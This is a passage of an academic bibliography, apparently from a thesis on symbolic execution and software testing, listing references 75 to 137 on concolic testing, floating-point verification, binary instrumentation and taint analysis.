[75] Sarfraz Khurshid, Corina S. P ̆ as ̆ areanu, and Willem Visser. Generalized Sym-
bolic Execution for Model Checking and Testing. In Proceedings of the 9th In-
ternational Conference on Tools and Algorithms for the Construction and Anal-
ysis of Systems , TACAS’03, pages 553–568, Berlin, Heidelberg, 2003. Springer-
Verlag.
[76] Moonzoo Kim, Yunho Kim, and G. Rothermel. A Scalable Distributed Con-
colic Testing Approach: An Empirical Evaluation. In IEEE Fifth International
Conference on Software Testing, Verification and Validation , ICST’12, pages
340 –349, april 2012.
[77] James C. King. Symbolic Execution and Program Testing. Communications of
the ACM , 19:385–394, July 1976.
[78] D.E. Knuth and P.B. Bendix. Simple Word Problems in Universal Algebras.
In J. Siekmann and Graham Wrightson, editors, Automation of Reasoning ,
Symbolic Computation, pages 342–376. Springer Berlin Heidelberg, 1983.
[79] Daniel Kroening, Alex Groce, and Edmund Clarke. Counterexample Guided
Abstraction Refinement Via Program Execution. In Jim Davies, Wolfram
Schulte, and Mike Barnett, editors, Formal Methods and Software Engineering ,
volume 3308 of Lecture Notes in Computer Science , pages 224–238. Springer
Berlin Heidelberg, 2004.
BIBLIOGRAPHY 189
[80] Victor V. Kuliamin. Standardization and Testing of Implementations of Math-
ematical Functions in Floating Point Numbers. Programming and Computer
Software , 33(3):154–173, 2007.
[81] Volodymyr Kuznetsov, Johannes Kinder, Stefan Bucur, and George Candea.
Efficient State Merging in Symbolic Execution. In Proceedings of the 33rd ACM
SIGPLAN Conference on Programming Language Design and Implementation ,
PLDI ’12, pages 193–204, New York, NY, USA, 2012. ACM.
[82] Kiran Lakhotia, Nikolai Tillmann, Mark Harman, and Jonathan De Halleux.
FloPSy: Search-based Floating Point Constraint Solving for Symbolic Execu-
tion. In Proceedings of the 22nd IFIP WG 6.1 International Conference on
Testing Software and Systems , ICTSS’10, pages 142–157, Berlin, Heidelberg,
2010. Springer-Verlag.
[83] R. Langner. Stuxnet: Dissecting a Cyberwarfare Weapon. Security Privacy,
IEEE , 9(3):49–51, May 2011.
[84] Xavier Leroy. Formal Verification of a Realistic Compiler. Communications of
the ACM , 52(7):107–115, 2009.
[85] Nancy G Leveson and Clark S Turner. An Investigation of the Therac-25 Ac-
cidents. Computer , 26(7):18–41, 1993.
[86] Guodong Li, Indradeep Ghosh, and Sreeranga P. Rajan. KLOVER: A Symbolic
Execution and Automatic Test Generation Tool for C++ Programs. In Pro-
ceedings of the 23rd International Conference on Computer Aided Verification ,
CAV’11, pages 609–615, Berlin, Heidelberg, 2011. Springer-Verlag.
[87] Guodong Li, Peng Li, Geof Sawaya, Ganesh Gopalakrishnan, Indradeep Ghosh,
and Sreeranga P. Rajan. GKLEE: Concolic Verification and Test Generation
for GPUs. In Proceedings of the 17th ACM SIGPLAN Symposium on Principles
and Practice of Parallel Programming , PPoPP ’12, pages 215–224, New York,
NY, USA, 2012. ACM.
BIBLIOGRAPHY 190
[88] LTP. The Linux Test Project. http://ltp.sourceforge.net.
[89] Chi-Keung Luk, Robert Cohn, Robert Muth, Harish Patil, Artur Klauser, Ge-
off Lowney, Steven Wallace, Vijay Janapa Reddi, and Kim Hazelwood. Pin:
Building Customized Program Analysis Tools with Dynamic Instrumentation.
InProceedings of the 2005 ACM SIGPLAN Conference on Programming Lan-
guage Design and Implementation , PLDI ’05, pages 190–200, 2005.
[90] H. Lycklama and C. Christensen. A Minicomputer Satellite Processor System.
Technical Report 6, July–August 1978.
[91] Paul Dan Marinescu and Cristian Cadar. make test-zesti: A Symbolic Exe-
cution Solution for Improving Regression Testing. In Proceedings of the 2012
International Conference on Software Engineering , ICSE 2012, pages 716–726,
Piscataway, NJ, USA, 2012. IEEE Press.
[92] Lorenzo Martignoni, Stephen McCamant, Pongsin Poosankam, Dawn Song, and
Petros Maniatis. Path-Exploration Lifting: Hi-Fi Tests for Lo-Fi Emulators. In
ASPLOS , ASPLOS ’12, pages 337–348, New York, NY, USA, 2012. ACM.
[93] Henry Massalin. Superoptimizer: A Look at the Smallest Program. In Pro-
ceedings of the second International Conference on Architectual support for Pro-
gramming Languages and Operating Systems , ASPLOS-II, pages 122–126, 1987.
[94] Matthew Maurer and David Brumley. TACHYON: Tandem Execution for Ef-
ficient Live Patch Testing. In Proceedings of the 21st USENIX Conference
on Security Symposium , Security’12, pages 43–43, Berkeley, CA, USA, 2012.
USENIX Association.
[95] Antoine Min ́ e. Relational Abstract Domains for the Detection of Floating-Point
Run-Time Errors. In David A. Schmidt, editor, ESOP , pages 3–17. Springer,
2004.
[96] David Molnar, Xue Cong Li, and David A. Wagner. Dynamic Test Generation
to Find Integer Bugs in x86 Binary Linux Programs. In Proceedings of the 18th
conference on USENIX security Symposium , SSYM’09, pages 67–82, 2009.
BIBLIOGRAPHY 191
[97] David Monniaux. The Pitfalls of Verifying Floating-Point Computations. ACM
Trans. Program. Lang. Syst. , 30(3):12:1–12:41, May 2008.
[98] George C. Necula. Translation Validation for an Optimizing Compiler. In
Proceedings of the ACM SIGPLAN 2000 conference on Programming language
Design and Implementation , PLDI ’00, pages 83–94, 2000.
[99] Nicholas Nethercote and Julian Seward. How to Shadow Every Byte of Memory
Used by a Program. In Proceedings of the 3rd International Conference on
Virtual execution environments , VEE ’07, pages 65–74, New York, NY, USA,
2007. ACM.
[100] Nicholas Nethercote and Julian Seward. Valgrind: A Framework for Heavy-
weight Dynamic Binary Instrumentation. In Proceedings of the 2007 ACM
SIGPLAN conference on Programming language Design and Implementation ,
PLDI ’07, pages 89–100, 2007.
[101] James Newsome and Dawn Song. Dynamic Taint Analysis for Automatic De-
tection, Analysis, and Signature Generation of Exploits on Commodity Soft-
ware. In Proceedings of the Network and Distributed System Security Sympo-
sium, NDSS’05, 2005.
[102] J. O’Leary, X. Zhao, R. Gerth, and C.-J. H. Seger. Formally Verifying IEEE
Compliance of Floating-Point Hardware. Technical report, Intel Technical Jour-
nal, First quarter 1999.
[103] Roberto Paleari, Lorenzo Martignoni, Giampaolo Fresi Roglia, and Danilo Br-
uschi. N-version Disassembly: Differential Testing of x86 Disassemblers. In Pro-
ceedings of the 19th International Symposium on Software Testing and Analysis ,
ISSTA ’10, pages 265–274, 2010.
[104] Roberto Paleari, Lorenzo Martignoni, Giampaolo Fresi Roglia, and Danilo Br-
uschi. A Fistful of Red-pills: How to Automatically Generate Procedures to
BIBLIOGRAPHY 192
Detect CPU Emulators. In Proceedings of the 3rd USENIX Conference on Of-
fensive Technologies , WOOT’09, pages 2–2, Berkeley, CA, USA, 2009. USENIX
Association.
[105] Hristina Palikareva and Cristian Cadar. Multi-solver Support in Symbolic Exe-
cution. In Proceedings of the 25th International Conference on Computer Aided
Verification , CAV’13, pages 53–68, Berlin, Heidelberg, 2013. Springer-Verlag.
[106] Jan Peleska, Elena Vorobev, and Florian Lapschies. Automated Test Case
Generation with SMT-Solving and Abstract Interpretation. In Mihaela Bobaru,
Klaus Havelund, Gerard J. Holzmann, and Rajeev Joshi, editors, NASA Formal
Methods , volume 6617 of Lecture Notes in Computer Science , pages 298–312.
Springer Berlin Heidelberg, 2011.
[107] A. Pnueli, M. Siegel, and E. Singerman. Translation Validation. In Bern-
hard Steffen, editor, Proceedings of the 4th International Conference on Tools
and Algorithms for the Construction and Analysis of Systems , volume 1384 of
TACAS’98 , pages 151–166. Springer Berlin / Heidelberg, 1998.
[108] Corina P ̆ as ̆ areanu and Willem Visser. A Survey of New Trends in Symbolic
Execution for Software Testing and Analysis. International Journal on Software
Tools for Technology Transfer (STTT) , 11:339–353, 2009.
[109] C. V. Ramamoorthy, S. F. Ho, and W. T. Chen. On the Automated Generation
of Program Test Data. In Proceedings of the 2nd International Conference on
Software Engineering , ICSE ’76, pages 293–300, 1976.
[110] David A. Ramos and Dawson R. Engler. Practical, Low-Effort Equivalence
Verification of Real Code. In Proceedings of the 23rd International Conference
on Computer Aided Verification , CAV’11, pages 669–685, 2011.
[111] Henry Gordon Rice. Classes of Recursively Enumerable Sets and their Decision
Problems. Transactions of the American Mathematical Society , pages 358–366,
1953.
BIBLIOGRAPHY 193
[112] Michael Riley. NSA Said to Exploit Heartbleed Bug for Intelligence for Years.
Retrieved from Bloomberg: www.bloomberg.com/news/2014-04-11/nsa-said-to-
have-used-heartbleed-bug-exposing-consumers.html. Accessed July , 7, 2014.
[113] Anthony Romano and Dawson R. Engler. Expression Reduction from Programs
in a Symbolic Binary Executor. In SPIN’13 , pages 301–319, 2013.
[114] Philipp R ̈ ummer. Preliminary SMT-FPA Conformance Tests, 2010.
[115] Philipp R ̈ ummer and Thomas Wahl. An SMT-LIB Theory of Binary Floating-
Point Arithmetic. In Informal proceedings of 8th International Workshop on
Satisfiability Modulo Theories (SMT) at FLoC, Edinburgh, Scotland , 2010.
[116] Raimondas Sasnauskas, Olaf Landsiedel, Muhammad Hamad Alizai, Carsten
Weise, Stefan Kowalewski, and Klaus Wehrle. KleeNet: Discovering Insidious
Interaction Bugs in Wireless Sensor Networks Before Deployment. In Proceed-
ings of the 9th ACM/IEEE International Conference on Information Processing
in Sensor Networks , IPSN’10, Stockholm, Sweden, April 2010.
[117] Stefan Savage, Michael Burrows, Greg Nelson, Patrick Sobalvarro, and Thomas
Anderson. Eraser: A Dynamic Data Race Detector for Multithreaded Programs.
ACM Transactions on Computer Systems , 15(4):391–411, November 1997.
[118] Eric Schkufza, Rahul Sharma, and Alex Aiken. Stochastic Superoptimization.
InProceedings of the Eighteenth International Conference on Architectural Sup-
port for Programming Languages and Operating Systems , ASPLOS ’13, pages
305–316, New York, NY, USA, 2013. ACM.
[119] Koushik Sen, Darko Marinov, and Gul Agha. CUTE: A Concolic Unit Testing
Engine for C. In Proc. of the 13th ACM SIGSOFT International Symposium
on Foundations of Software Engineering , ESEC/FSE-13, pages 263–272, 2005.
[120] Thomas Sewell, Magnus Myreen, and Gerwin Klein. Translation Validation for
a Verified OS Kernel. In Proceedings of the 2013 ACM-SIGPLAN Conference on
BIBLIOGRAPHY 194
Programming Language Design and Implementation , PLDI’13, page 11, Seattle,
Washington, USA, June 2013. ACM.
[121] J.H. Siddiqui and S. Khurshid. ParSym: Parallel Symbolic Execution. In 2nd
International Conference on Software Technology and Engineering , volume 1 of
ICSTE’10 , pages V1–405 –V1–409, October 2010.
[122] Stephen F. Siegel and Timothy K. Zirkel. Automatic Formal Verification of
MPI-based Parallel Programs. In Proceedings of the 16th ACM Symposium on
Principles and Practice of Parallel Programming , PPoPP ’11, pages 309–310,
New York, NY, USA, 2011. ACM.
[123] Nishant Sinha. Symbolic Program Analysis using Term Rewriting and Gen-
eralization. FMCAD ’08, pages 19:1–19:9, Piscataway, NJ, USA, 2008. IEEE
Press.
[124] Dawn Song, David Brumley, Heng Yin, Juan Caballero, Ivan Jager, Min Gyung
Kang, Zhenkai Liang, James Newsome, Pongsin Poosankam, and Prateek Sax-
ena. BitBlaze: A New Approach to Computer Security via Binary Analysis.
ICISS ’08, pages 1–25, Berlin, Heidelberg, 2008.
[125] Amitabh Srivastava and Alan Eustace. ATOM: A System for Building Cus-
tomized Program Analysis Tools. In Proceedings of the ACM SIGPLAN 1994
Conference on Programming Language Design and Implementation , PLDI ’94,
pages 196–205, 1994.
[126] Michael Stepp, Ross Tate, and Sorin Lerner. Equality-based Translation Valida-
tor for LLVM. In Proceedings of the 23rd International Conference on Computer
Aided Verification , CAV’11, pages 737–742, Berlin, Heidelberg, 2011. Springer-
Verlag.
[127] Nikolai Tillmann and Jonathan De Halleux. Pex: White Box Test Generation
for .NET. In Proceedings of the 2nd International Conference on Tests and
Proofs , TAP’08, pages 134–153, Berlin, Heidelberg, 2008. Springer-Verlag.
BIBLIOGRAPHY 195
[128] Richard Uhlig, David Nagle, Tim Stanley, Trevor Mudge, Stuart Sechrest, and
Richard Brown. Design Tradeoffs for Software-Managed TLBs. In ACM Trans-
actions on Computer Systems , pages 27–38, 1993.
[129] Carl A. Waldspurger and William E. Weihl. Lottery Scheduling: Flexible
Proportional-share Resource Management. In Proceedings of the 1st USENIX
Conference on Operating Systems Design and Implementation , OSDI’94, Berke-
ley, CA, USA, 1994. USENIX Association.
[130] Tielei Wang, Tao Wei, Guofei Gu, and Wei Zou. Checksum-Aware Fuzzing
Combined with Dynamic Taint Analysis and Symbolic Execution. ACM Trans.
Inf. Syst. Secur. , 14(2):15:1–15:28, September 2011.
[131] Tielei Wang, Tao Wei, Zhiqiang Lin, and Wei Zou. IntScope: Automatically De-
tecting Integer Overflow Vulnerability in x86 Binary using Symbolic Execution.
InNDSS’09 , 2009.
[132] David A. Wheeler. SLOCcount, 2009.
[133] Tao Xie, Darko Marinov, Wolfram Schulte, and David Notkin. Symstra: A
Framework for Generating Object-Oriented Unit Tests Using Symbolic Execu-
tion. In Proceedings of the 11th International Conference on Tools and Algo-
rithms for the Construction and Analysis of Systems , TACAS’05, pages 365–
381, Berlin, Heidelberg, 2005. Springer-Verlag.
[134] Ru-Gang Xu, Patrice Godefroid, and Rupak Majumdar. Testing for Buffer
Overflows with Length Abstraction. In Proceedings of the 2008 International
Symposium on Software Testing and Analysis , ISSTA ’08, pages 27–38, New
York, NY, USA, 2008. ACM.
[135] Xuejun Yang, Yang Chen, Eric Eide, and John Regehr. Finding and Under-
standing Bugs in C Compilers. In Proceedings of the 32nd ACM SIGPLAN
conference on Programming language Design and Implementation , PLDI ’11,
pages 283–294, New York, NY, USA, 2011. ACM.
BIBLIOGRAPHY 196
[136] Yuan Yu, Tom Rodeheffer, and Wei Chen. RaceTrack: Efficient Detection of
Data Race Conditions via Adaptive Tracking. In SOSP ’05: Proceedings of the
twentieth ACM Symposium on Operating systems principles , pages 221–234,
New York, NY, USA, 2005. ACM.
[137] Qin Zhao, Derek Bruening, and Saman Amarasinghe. Umbra: Efficient and
Scalable Memory Shadowing. In Proceedings of the 8th annual IEEE/ACM In-
ternational Symposium on Code Generation and Optimization , CGO ’10, pages
22–31, New York, NY, USA, 2010. ACM.